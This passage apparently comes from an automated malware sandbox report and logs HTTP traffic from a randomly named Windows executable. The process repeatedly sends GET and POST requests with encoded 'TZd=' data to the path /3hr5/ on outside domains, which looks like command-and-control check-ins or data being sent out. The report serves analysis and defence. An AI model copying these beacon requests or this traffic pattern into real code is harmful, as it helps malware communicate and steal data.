                                                                                                                              Dec 4, 2023 15:28:30.954958916 CET2626OUTData Raw: 37 36 31 2b 37 48 68 59 50 39 64 78 41 79 4c 4c 58 48 37 41 35 44 79 4b 57 73 4b 6f 2f 36 30 39 4c 6e 42 54 47 55 55 54 6d 76 4b 66 63 48 4e 36 42 65 4d 51 4a 35 51 47 6e 77 6f 2f 74 2f 52 46 6f 79 42 2f 65 65 41 4f 61 33 33 51 71 45 62 45 79 71
                                                                                                                              Data Ascii: 761+7HhYP9dxAyLLXH7A5DyKWsKo/609LnBTGUUTmvKfcHN6BeMQJ5QGnwo/t/RFoyB/eeAOa33QqEbEyqk7IjoHJMk9aU6xb1YZp/2Xdek9Git5sHAtG6qQXtC3YXnzNz6QM8GWUfYJDwGm2BXgBdwKT83xXKte4Z9kLZjNZPHuZ+w/3FZeDoBOlgN4NsMRsjMLfGPBZI4Pdnnb3sgcwF73pqrE4diH0dK65jmou4xOlQFMOwN
                                                                                                                              Dec 4, 2023 15:28:30.955132008 CET2626OUTData Raw: 73 6e 70 56 6b 68 4f 7a 4a 58 32 2b 6a 79 4d 54 5a 2b 43 44 7a 4a 33 39 2f 70 56 73 6c 38 7a 79 63 52 51 75 67 2f 6a 70 30 35 62 76 49 57 37 4f 4d 31 66 4b 30 58 4e 4b 63 58 4b 50 71 53 64 36 42 45 4a 44 48 57 63 55 31 36 5a 74 7a 43 65 47 44 71
                                                                                                                              Data Ascii: snpVkhOzJX2+jyMTZ+CDzJ39/pVsl8zycRQug/jp05bvIW7OM1fK0XNKcXKPqSd6BEJDHWcU16ZtzCeGDqyeVd5VogU/gXDcXRtIkCAqclLbmuDnp75clBXIr5sYo84o0/v4vfq81OMAJbhnBXIYJxEsbF3rGoDI9TYEsbNDRtXUYZRL9esJiQyAx5IYabjQq27mBh96Ep/+9kN66bV9Fxv9g6KFD9/Cam05uoIzyR73+k3+ztJ
                                                                                                                              Dec 4, 2023 15:28:30.955431938 CET3912OUTData Raw: 4e 68 6a 43 72 70 4a 6e 46 78 58 44 77 30 43 51 68 33 30 51 66 57 42 7a 6c 51 42 75 56 79 63 47 4c 33 52 79 68 62 67 6c 54 2b 33 56 39 4f 63 73 50 34 2f 61 64 54 31 4f 45 53 64 79 52 7a 43 4a 78 66 50 6f 4c 79 35 76 78 38 79 54 39 6f 6d 2b 38 4c
                                                                                                                              Data Ascii: NhjCrpJnFxXDw0CQh30QfWBzlQBuVycGL3RyhbglT+3V9OcsP4/adT1OESdyRzCJxfPoLy5vx8yT9om+8LKgt7Tuk2DZyQt3pY0SM8BxRX2rspJxTTpVOdvQwt5t7b8EZhUt5SQscygluYIg30jxMJe+ivpCt93OiwS1olzqhk/HbFBQ66s7wyRvk/5ytrr1ORkT0viqYqeFORzRWP3y7Jyi4ogTqGTOGeXalIN/fvCDLR2qtTI


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              93192.168.11.205022491.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:33.292427063 CET544OUTGET /3hr5/?TZd=cybVuDtLHKDYoAC8BtRtsfHHNdqM0/3VmZgYz4alBfxy2AFWbwCj5N7XVIo5x4xVvDhkEXfU/TSdDvvPnMbZ8BO8VTwNCq9LYQ==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1
                                                                                                                              Host: www.engindenizyurdu.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:28:33.560586929 CET1340INHTTP/1.1 200 OK
                                                                                                                              date: Mon, 04 Dec 2023 14:28:33 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              vary: Accept-Encoding
                                                                                                                              x-powered-by: PHP/8.1.17
                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TLtGuZfCLdrjO52DqbnMk6Vu01gcdxyA/mCtG+XanHCMsfvWI6N6pZKxka7u0lUC0VHAmEC4srnAdW5yeXhnhQ==
                                                                                                                              last-modified: Mon, 04 Dec 2023 14:28:33 GMT
                                                                                                                              x-cache-miss-from: parking-698fb476bf-6x2qm
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 32 45 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 54 4c 74 47 75 5a 66 43 4c 64 72 6a 4f 35 32 44 71 62 6e 4d 6b 36 56 75 30 31 67 63 64 78 79 41 2f 6d 43 74 47 2b 58 61 6e 48 43 4d 73 66 76 57 49 36 4e 36 70 5a 4b 78 6b 61 37 75 30 6c 55 43 30 56 48 41 6d 45 43 34 73 72 6e 41 64 57 35 79 65 58 68 6e 68 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 65 6e 67 69 6e 64 65 6e 69 7a 79 75 72 64 75 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 65 6e 67 69 6e 64 65 6e 69 7a 79 75 72 64 75 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 67 69 6e 64 65 6e 69 7a 79 75 72 64 75 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e
                                                                                                                              Data Ascii: 2EE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TLtGuZfCLdrjO52DqbnMk6Vu01gcdxyA/mCtG+XanHCMsfvWI6N6pZKxka7u0lUC0VHAmEC4srnAdW5yeXhnhQ==><head><meta charset="utf-8"><title>engindenizyurdu.com&nbsp;-&nbsp;engindenizyurdu Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="engindenizyurdu.com is your first and best source for all of the information youre lookin
                                                                                                                              Dec 4, 2023 15:28:33.560736895 CET1340INData Raw: 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 65 6e 67 69 6e 64 65 6e
                                                                                                                              Data Ascii: g for. From general topics to more of what you would expect to find here, engindenizyurdu.com has it all. We hope you find what you are se570arching for!"><link rel="icon" type="image/png" href="//img.sedoparking.co
                                                                                                                              Dec 4, 2023 15:28:33.560800076 CET1340INData Raw: 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b
                                                                                                                              Data Ascii: oot){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-we
                                                                                                                              Dec 4, 2023 15:28:33.560862064 CET1340INData Raw: 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d
                                                                                                                              Data Ascii: y:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-bu
                                                                                                                              Dec 4, 2023 15:28:33.560935020 CET1340INData Raw: 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f
                                                                                                                              Data Ascii: container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us
                                                                                                                              Dec 4, 2023 15:28:33.561026096 CET1340INData Raw: 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f
                                                                                                                              Data Ascii: ansition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;dis
                                                                                                                              Dec 4, 2023 15:28:33.561086893 CET1340INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73
                                                                                                                              Data Ascii: d-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;fo
                                                                                                                              Dec 4, 2023 15:28:33.561144114 CET1340INData Raw: 72 65 6c 61 74 69 76 65 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f
                                                                                                                              Data Ascii: relative;height:100%;max-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlink
                                                                                                                              Dec 4, 2023 15:28:33.561201096 CET1340INData Raw: 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69
                                                                                                                              Data Ascii: osition-y:top}.container-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.tw
                                                                                                                              Dec 4, 2023 15:28:33.561256886 CET1340INData Raw: 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f
                                                                                                                              Data Ascii: rchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-deco
                                                                                                                              Dec 4, 2023 15:28:33.742947102 CET1340INData Raw: 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 54 4c 74 47 75 5a 66 43 4c 64 72 6a 4f 35 32 44 71 62 6e 4d 6b 36 56 75 30 31 67 63 64 78 79 41 2f 6d 43 74 47 2b 58 61 6e 48 43 4d
                                                                                                                              Data Ascii: fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TLtGuZfCLdrjO52DqbnMk6Vu01gcdxyA/mCtG+XanHCMsfvWI6N6pZKxka7u0lUC0VHAmEC4srnAdW5yeXhnhQ==","tid":3199,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbo570x":true,"noFollow":f


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              94192.168.11.205022591.184.0.200808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:39.281903028 CET828OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.opleverdossier.online
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.opleverdossier.online
                                                                                                                              Referer: http://www.opleverdossier.online/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4a 74 58 43 2b 4e 72 36 30 48 77 50 41 47 76 78 43 55 54 31 68 36 44 6d 53 70 33 38 42 55 67 68 63 4a 53 49 71 2f 49 7a 35 5a 65 74 68 48 50 4d 6c 2f 36 4f 68 59 32 78 52 70 6c 55 2f 46 37 5a 70 64 32 5a 67 59 4c 5a 37 4a 72 50 49 68 66 70 78 51 61 7a 75 74 6b 73 69 4e 51 5a 4d 71 37 4a 48 46 54 37 75 65 51 6e 32 74 35 76 6e 32 37 50 66 61 45 67 31 35 39 50 55 6c 72 56 73 4f 38 4e 4b 42 37 42 6c 59 2f 48 59 6e 33 77 62 70 38 4a 49 63 73 33 7a 6a 71 68 76 72 54 75 68 65 47 59 6a 5a 6a 73 6d 55 47 77 57 4a 65 51 74 30 4b 52 6a 77 3d 3d
                                                                                                                              Data Ascii: TZd=JtXC+Nr60HwPAGvxCUT1h6DmSp38BUghcJSIq/Iz5ZethHPMl/6OhY2xRplU/F7Zpd2ZgYLZ7JrPIhfpxQazutksiNQZMq7JHFT7ueQn2t5vn27PfaEg159PUlrVsO8NKB7BlY/HYn3wbp8JIcs3zjqhvrTuheGYjZjsmUGwWJeQt0KRjw==
                                                                                                                              Dec 4, 2023 15:28:39.458811998 CET554INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:39 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Content-Length: 196
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              95192.168.11.205022691.184.0.200808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:41.994136095 CET1168OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.opleverdossier.online
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.opleverdossier.online
                                                                                                                              Referer: http://www.opleverdossier.online/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4a 74 58 43 2b 4e 72 36 30 48 77 50 41 6d 2f 78 53 44 48 31 70 36 44 6c 58 70 33 38 49 30 67 6c 63 4a 65 49 71 2b 64 34 34 72 4b 74 68 69 72 4d 72 62 57 4f 73 34 32 78 61 4a 6b 65 69 31 37 4f 70 64 71 37 67 59 48 5a 37 4e 44 50 4a 58 54 70 33 67 61 38 67 4e 6b 76 6e 39 51 59 49 71 36 45 48 46 58 5a 75 61 41 6e 33 65 4e 76 6d 77 58 50 4f 62 46 32 6b 4a 39 7a 44 31 72 53 35 2b 38 66 4b 42 6e 33 6c 5a 33 39 62 57 7a 77 61 4b 6b 4a 61 63 73 30 70 6a 71 69 6a 4c 53 45 6c 74 6e 53 36 49 72 76 32 57 4f 36 64 34 76 65 75 6e 37 49 31 78 62 6d 6f 49 44 42 6f 37 65 36 4b 42 58 2b 57 46 2b 65 6e 62 77 2b 6b 35 73 50 36 74 65 55 31 55 77 50 70 44 4c 68 50 73 46 6d 56 42 35 4b 6d 69 30 45 72 75 6f 38 78 46 67 65 44 38 53 61 53 4e 78 6b 77 65 64 6e 36 45 50 48 43 59 48 6b 77 74 32 33 6e 68 76 6a 4f 33 2b 39 2b 51 42 73 56 4d 61 49 53 6f 71 78 72 6b 63 43 4e 68 53 63 57 33 6e 76 2b 76 37 71 32 55 47 77 64 58 69 55 31 73 54 4f 57 36 58 47 6e 65 47 67 6b 75 32 62 54 57 42 63 73 34 75 77 41 36 46 43 4c 55 78 73 57 35 54 31 33 49 73 33 43 34 51 4d 44 4c 65 4b 50 6c 6f 7a 70 75 66 51 49 37 79 36 44 37 49 31 38 50 6e 50 67 38 45 37 2f 72 4f 73 30 73 41 73 47 6b 57 49 48 53 34 38 79 43 57 65 54 64 4a 55 78 75 78 79 6b 2f 44 61 70 57 5a 75 35 71 6c 6f 57 6a 58 42 69 39 56 45 5a 49 45 2b 67 6e 4f 65 68 75 61 45 44 67 37 63 42 72 45 73 67 6a 75 6e 41 37 5a 50 49 6d 54 6c 48 78 58 39 4b 45 79 6c 73 6b 35 52 4c 69 58 36 6f 73 48 43 30 4b 46 30 6a 57 76 53 51 6b 77 78 59 79 49 2f 31 2b 2f 54 77 43 4f 44 43 53 74 62 74 2b 4c 6f 2f 55 4a 73 52 78 44 44 61 4f 34 3d
                                                                                                                              Data Ascii: TZd=JtXC+Nr60HwPAm/xSDH1p6DlXp38I0glcJeIq+d44rKthirMrbWOs42xaJkei17Opdq7gYHZ7NDPJXTp3ga8gNkvn9QYIq6EHFXZuaAn3eNvmwXPObF2kJ9zD1rS5+8fKBn3lZ39bWzwaKkJacs0pjqijLSEltnS6Irv2WO6d4veun7I1xbmoIDBo7e6KBX+WF+enbw+k5sP6teU1UwPpDLhPsFmVB5Kmi0Eruo8xFgeD8SaSNxkwedn6EPHCYHkwt23nhvjO3+9+QBsVMaISoqxrkcCNhScW3nv+v7q2UGwdXiU1sTOW6XGneGgku2bTWBcs4uwA6FCLUxsW5T13Is3C4QMDLeKPlozpufQI7y6D7I18PnPg8E7/rOs0sAsGkWIHS48yCWeTdJUxuxyk/DapWZu5qloWjXBi9VEZIE+gnOehuaEDg7cBrEsgjunA7ZPImTlHxX9KEylsk5RLiX6osHC0KF0jWvSQkwxYyI/1+/TwCODCStbt+Lo/UJsRxDDaO4=
                                                                                                                              Dec 4, 2023 15:28:42.177186012 CET554INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:42 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Content-Length: 196
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              96192.168.11.205022791.184.0.200808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:44.691514969 CET12914OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.opleverdossier.online
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.opleverdossier.online
                                                                                                                              Referer: http://www.opleverdossier.online/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4a 74 58 43 2b 4e 72 36 30 48 77 50 41 6d 2f 78 53 44 48 31 70 36 44 6c 58 70 33 38 49 30 67 6c 63 4a 65 49 71 2b 64 34 34 71 79 74 68 77 6a 4d 72 38 43 4f 74 34 32 78 54 70 6b 66 69 31 37 32 70 64 79 2f 67 59 36 6b 37 4c 48 50 4a 45 37 70 33 56 75 38 71 74 6b 69 6f 64 51 61 4d 71 36 51 48 46 54 7a 75 61 39 46 32 74 52 76 6e 33 72 50 66 34 38 67 73 35 39 50 44 31 72 4f 7a 65 39 6f 4b 42 7a 5a 6c 5a 37 39 62 54 7a 77 55 66 34 4a 4a 72 59 30 79 6a 71 74 74 72 53 50 72 39 6e 72 36 49 2b 65 32 57 4f 41 64 36 44 65 75 67 48 49 30 79 7a 70 76 6f 44 42 6e 72 65 31 4f 42 62 6c 57 44 62 4c 6e 62 45 2b 6b 35 55 50 37 4e 65 55 6e 67 45 49 2f 54 4c 6a 4e 63 45 6b 65 68 6c 34 6d 69 67 2b 72 75 38 38 78 56 30 65 43 4c 47 61 55 6f 64 6b 76 4f 64 68 32 55 4f 62 55 6f 48 47 77 74 6e 59 6e 68 50 5a 4f 77 2b 39 2b 30 56 73 45 66 43 4c 57 49 71 72 6b 45 63 62 4a 68 75 59 57 33 57 30 2b 76 36 74 32 56 79 77 64 45 71 55 6e 5a 6e 4a 52 71 58 64 76 2b 47 31 74 4f 79 6e 54 57 4d 52 73 34 57 65 41 34 70 43 45 55 78 73 41 36 37 36 39 34 73 77 41 34 51 65 4f 72 66 4b 50 6c 6b 56 70 76 4b 6c 49 4b 65 36 43 4c 34 31 34 66 6e 4d 79 4d 45 2f 30 4c 4f 71 77 73 41 73 47 6b 61 32 48 53 6b 38 78 7a 2b 65 53 76 68 55 68 4e 4a 79 33 76 43 52 70 57 5a 7a 35 71 6f 49 57 6a 65 53 69 38 6c 36 5a 4b 6f 2b 67 56 6d 65 69 76 61 48 54 67 36 33 46 72 45 37 39 54 69 77 41 37 46 48 49 6d 43 48 48 47 76 39 4c 45 69 6c 6f 6b 35 65 41 69 57 54 2b 63 48 71 77 4b 4a 34 6a 56 61 76 51 6b 46 36 59 78 49 2f 78 61 32 6b 67 53 57 55 58 77 39 33 78 4b 76 7a 30 33 56 74 42 68 62 56 50 6f 51 4e 6b 69 67 78 6e 43 65 31 72 78 6e 70 46 5a 42 4f 52 70 